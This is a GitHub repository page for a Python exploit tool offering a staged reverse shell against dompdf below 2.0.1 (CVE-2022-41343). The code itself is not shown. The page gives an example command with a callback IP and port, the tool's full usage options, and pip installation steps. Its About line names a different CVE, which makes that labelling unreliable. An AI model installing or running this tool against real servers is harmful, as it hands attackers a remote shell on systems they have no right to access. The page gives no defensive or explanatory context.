Skip to content

BKreisel/CVE-2022-41343

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

CVE-2022-41343

🐍 Python Exploit for CVE-2022-41343

Staged Reverse Shell for dompdf < 2.0.1

Based on: Positive Sec's write-up and PoC

Example

cve-2022-41343 10.10.16.3 44444

Usage

usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Server Listening Port (default: 55555)
  -s SHELL, --shell SHELL
                        Remote Shell (default: bash)
  -n FONT_NAME, --font-name FONT_NAME
                        Exploit Font Name (default: comicsploitz)

PyPi Installation

python3 -m pip install cve-2022-41343

Manual Installation

python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo

About

🐍 Python Exploit for CVE-2022-23935

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages